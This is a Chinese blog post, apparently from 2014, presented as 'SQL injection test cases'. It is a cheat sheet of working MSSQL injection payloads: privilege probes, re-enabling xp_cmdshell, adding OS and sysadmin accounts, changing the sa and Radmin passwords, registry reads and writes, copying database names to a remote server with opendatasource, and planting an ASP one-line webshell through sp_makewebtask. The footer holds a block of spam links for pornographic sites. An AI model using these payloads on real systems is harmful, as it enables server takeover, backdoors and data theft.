<rt id="bn8ez"></rt>
<label id="bn8ez"></label>

  • <span id="bn8ez"></span>

    <label id="bn8ez"><meter id="bn8ez"></meter></label>

    qileilove

    blog已經轉移至github,大家請訪問 http://qaseven.github.io/

    SQL注入測試用例

      //看看是什么權限的
      and 1=(Select IS_MEMBER('db_owner'))
      And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
      //檢測是否有讀取某數據庫的權限
      and 1= (Select HAS_DBACCESS('master'))
      And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
      數字類型
      and char(124)%2Buser%2Bchar(124)=0
      字符類型
      ' and char(124)%2Buser%2Bchar(124)=0 and ''='
      搜索類型
      ' and char(124)%2Buser%2Bchar(124)=0 and '%'='
      爆用戶名
      and user>0
      ' and user>0 and ''='
      檢測是否為SA權限
      and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
      And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
      檢測是不是MSSQL數據庫
      and exists (select * from sysobjects);--
      檢測是否支持多行
      ;declare @d int;--
      恢復 xp_cmdshell
      ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
      select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
      //-----------------------
      //      執行命令
      //-----------------------
      首先開啟沙盤模式:
      exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
      然后利用jet.oledb執行系統命令
      select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
      執行命令
      ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
      EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
      判斷xp_cmdshell擴展存儲過程是否存在:
      http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
     寫注冊表
      exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
      REG_SZ
      讀注冊表
      exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
      讀取目錄內容
      exec master..xp_dirtree 'c:\winnt\system32\',1,1
      數據庫備份
      backup database pubs to disk = 'c:\123.bak'
      //爆出長度
      And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
      更改sa口令方法:用sql綜合利用工具連接后,執行命令:
      exec sp_password NULL,'新密碼','sa'
      添加和刪除一個SA權限的用戶test:
      exec master.dbo.sp_addlogin test,ptlove
      exec master.dbo.sp_addsrvrolemember test,sysadmin
      刪除擴展存儲過過程xp_cmdshell的語句:
      exec sp_dropextendedproc 'xp_cmdshell'
      添加擴展存儲過過程
      EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
      GRANT exec On xp_proxiedadata TO public
      停掉或激活某個服務。
      exec master..xp_servicecontrol 'stop','schedule'
      exec master..xp_servicecontrol 'start','schedule'
      dbo.xp_subdirs
      只列某個目錄下的子目錄。
      xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
      dbo.xp_makecab
      將目標多個檔案壓縮到某個目標檔案之內。
      所有要壓縮的檔案都可以接在參數列的最后方,以逗號隔開。
      dbo.xp_makecab
      'c:\test.cab','mszip',1,
      'C:\Inetpub\wwwroot\SQLInject\login.asp',
      'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
      xp_terminate_process
      停掉某個執行中的程序,但賦予的參數是 Process ID。
      利用”工作管理員”,透過選單「檢視」-「選擇字段」勾選 pid,就可以看到每個執行程序的 Process ID
      xp_terminate_process 2484
      xp_unpackcab
      解開壓縮檔。
      xp_unpackcab 'c:\test.cab','c:\temp',1
      某機,安裝了radmin,密碼被修改了,regedit.exe不知道被刪除了還是被改名了,net.exe不存在,沒有辦法使用regedit /e 導入注冊文件,但是mssql是sa權限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密碼為12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 則端口值改為1234
      create database lcx;
      Create TABLE ku(name nvarchar(256) null);
      Create TABLE biao(id int NULL,name nvarchar(256) null);
      //得到數據庫名
      insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
      //在Master中創建表,看看權限怎樣
      Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
      用 sp_makewebtask直接在web目錄里寫入一句話馬:
      http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
      //更新表內容
      Update films SET kind = 'Dramatic' Where id = 123
      //刪除內容
      delete from table_name where Stockid = 3

    posted on 2014-04-25 10:12 順其自然EVO 閱讀(446) 評論(0)  編輯  收藏


    只有注冊用戶登錄后才能發表評論。


    網站導航:
     
    <2014年4月>
    303112345
    6789101112
    13141516171819
    20212223242526
    27282930123
    45678910

    導航

    統計

    常用鏈接

    留言簿(55)

    隨筆分類

    隨筆檔案

    文章分類

    文章檔案

    搜索

    最新評論

    閱讀排行榜

    評論排行榜

    主站蜘蛛池模板: 青青青国产色视频在线观看国产亚洲欧洲国产综合 | 毛片免费观看网址| 亚洲视频在线一区二区三区| 拍拍拍无挡视频免费观看1000| 免费少妇a级毛片人成网| 黄页免费视频播放在线播放| 亚洲电影日韩精品 | 综合亚洲伊人午夜网| 国产成人高清精品免费观看| 中文字幕亚洲图片| 免费无码H肉动漫在线观看麻豆| 亚洲一区二区三区香蕉| 中文字幕无码日韩专区免费 | 免费特级黄毛片在线成人观看| 中国亚洲呦女专区| 免费久久精品国产片香蕉| 成人精品综合免费视频| 亚洲人成影院在线无码按摩店| 免费一级毛片无毒不卡| 亚洲日本乱码一区二区在线二产线| 青青青免费国产在线视频小草| 亚洲 日韩经典 中文字幕| 国产免费人成视频在线观看| 久久久久久国产a免费观看不卡| 亚洲AV成人一区二区三区AV| 久久久久久国产精品免费免费| 精品韩国亚洲av无码不卡区| 国产偷国产偷亚洲高清日韩| 午夜免费啪视频在线观看| 亚洲国产综合精品中文第一| 亚洲高清最新av网站| 99精品视频在线视频免费观看| 亚洲国产精品成人综合色在线婷婷 | 亚洲精品国产高清嫩草影院 | 永久黄网站色视频免费直播| 不卡视频免费在线观看| 亚洲成a人片在线网站| 男人的天堂亚洲一区二区三区| 全黄A免费一级毛片| 亚洲视频免费观看| jlzzjlzz亚洲乱熟在线播放|